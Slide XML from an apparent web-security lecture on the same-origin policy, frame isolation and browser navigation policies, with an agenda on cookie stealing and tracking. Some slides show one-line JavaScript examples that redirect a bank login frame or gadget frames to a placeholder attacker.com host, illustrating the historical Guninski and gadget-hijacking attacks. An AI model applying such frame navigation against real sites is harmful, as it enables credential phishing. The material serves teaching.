              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>problems with SOP due to Frame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4382194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Frame isolation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1771650"/>
            <a:ext cx="8288338" cy="5392738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Other frames cannot access resources from other origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Browsers implement a navigation policy that is allowed (changing .location attribute of frame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>permissive policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Guninski attack on CitiBank</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>window policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>gadget hijacking attacks (igoogle+hotmail)</a:t>
            </a:r>
            <a:endParaRPr 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4393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538" y="2446338"/>
            <a:ext cx="6361112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Guninski attack (permissive policy, 1999)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="1601788"/>
            <a:ext cx="3468688" cy="278288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70" tIns="50685" rIns="101370" bIns="50685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4997" name="ZoneTexte 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6429375" y="1771650"/>
            <a:ext cx="3298825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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Other browser window/tab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>location = attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84998" name="ZoneTexte 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="592138" y="3795713"/>
            <a:ext cx="1776412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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>user: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pass:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84999" name="ZoneTexte 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="930275" y="6578600"/>
            <a:ext cx="761365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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SOP applies but attacker can navigate the login frame and replace it with its own code !</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85000" name="ZoneTexte 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6429375" y="2782888"/>
            <a:ext cx="3721100" cy="8715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101370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>citibankWindow.frames[0].</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>location = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“https://attacker.com/login”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2198688" y="1855788"/>
            <a:ext cx="3976687" cy="1179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308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Frame isolation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1771650"/>
            <a:ext cx="8288338" cy="5392738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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Other frames cannot access resources from other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>origins  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!-- This is **NOT** allowed --&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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alert(frames[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>contentDocument.body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>); //throws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>error</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Browsers implement a navigation policy that is allowed (changing .location attribute of frame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!-- This is 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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allowed --&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>[0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.location =  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr 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9363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Frame isolation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1771650"/>
            <a:ext cx="8288338" cy="5392738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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Other frames cannot access resources from other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>origins  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!-- This is **NOT** allowed --&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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alert(frames[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>contentDocument.body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>); //throws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>error</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Browsers implement a navigation policy that is allowed (changing .location attribute of frame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>permissive policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Guninski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> attack on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CitiBank</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>window policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>gadget hijacking attacks (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>igoogle+hotmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2768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Gadget Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87043" name="Picture 4" descr="igoogle-befo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0413" y="1771650"/>
            <a:ext cx="6348412" cy="474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10" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3298825" y="2530475"/>
            <a:ext cx="6259513" cy="927100"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44227"/>
              <a:gd name="adj2" fmla="val 946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1370" tIns="50685" rIns="101370" bIns="50685"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US"/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3300413" y="2647950"/>
            <a:ext cx="6264275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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top.frames[1].location = "http:/www.attacker.com/...“;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top.frames[2].location = "http:/www.attacker.com/...“;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27058223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0" grpId="0" animBg="1"/>
      <p:bldP spid="471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Gadget Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88067" name="Picture 4" descr="igoogle-af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0413" y="1771650"/>
            <a:ext cx="6343650" cy="473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7464740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Frame isolation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1771650"/>
            <a:ext cx="8288338" cy="5392738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Other frames cannot access resources from other origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Browsers implement a navigation policy that is allowed (changing .location attribute of frame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>permissive policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Guninski attack on CitiBank</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>window policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>gadget hijacking attacks (igoogle+hotmail)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>descendant policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>child policy </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2970768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Navigation policies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90115" name="Picture 2" descr="navigationPolicie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2850" y="1490663"/>
            <a:ext cx="5616575" cy="580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4416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Agenda: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Privacy-Violating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Flows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8733" y="2354759"/>
            <a:ext cx="9135428" cy="539721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23/11:Basis, Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Stealing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> and Location </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>: Mitigation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30/11: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Static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r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> for Secure Information Flow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07/12: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Dynamic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14/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Stateless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Hybrid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2744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52"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1042988" y="1346200"/>
          <a:ext cx="6096000" cy="5699759"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
                <a:gridCol w="2743200"/>
              </a:tblGrid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Browser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Policy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    IE 6 (default)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Permissive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    IE 6 (option)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Child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    IE7 (no Flash)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Descendant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    IE7 (with Flash)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Permissive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    Firefox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Window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    Safari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Permissive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    IE7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Descendant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    Firefox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Child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   Safari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Child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   